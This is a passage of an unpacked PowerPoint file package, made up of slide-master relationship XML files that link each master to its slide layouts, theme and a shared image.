Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1581.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout159.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout158.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout157.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout156.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout155.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout154.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout152.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme16.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout151.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster160.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1599.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1598.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1597.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1596.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1595.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1594.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1593.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1592.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme160.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1600.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1591.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster161.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1609.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1608.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1607.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1606.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1605.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1604.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1603.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1602.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme161.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1610.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1601.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster162.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1619.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1618.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1617.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1616.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1615.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1614.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1613.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1612.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme162.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1620.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1611.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster163.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1629.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1628.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1627.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1626.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1625.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1624.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1623.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1622.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme163.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1630.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1621.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster164.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1639.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1638.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1637.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1636.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1635.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1634.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1633.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1632.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme164.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1640.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1631.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster165.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1649.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1648.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1647.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1646.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1645.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1644.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1643.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1642.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme165.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1650.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1641.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster166.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1659.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1658.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1657.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1656.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1655.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1654.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1653.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1652.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme166.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1660.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1651.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster167.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1669.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1668.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1667.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1666.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1665.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1664.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1663.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1662.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme167.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1670.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1661.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster168.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1679.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1678.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1677.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1676.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1675.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1674.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1673.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1672.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme168.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1680.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1671.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster169.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1689.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1688.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1687.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1686.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1685.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1684.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1683.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1682.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme169.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1690.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1681.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout169.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout168.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout166.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout165.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout164.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout162.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme17.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout161.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster170.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1699.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1698.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1697.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1696.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1695.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1694.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1693.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1692.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme170.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1700.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1691.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster171.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1709.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1708.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1707.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1706.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1705.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1704.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1703.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1702.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme171.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1710.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1701.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster172.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1719.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1718.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1717.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1716.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1715.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1714.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1713.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1712.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme172.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1720.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1711.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster173.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1729.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1728.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1727.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1726.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1725.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1724.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1723.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1722.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme173.xml"/><Relationship Id="rId11" 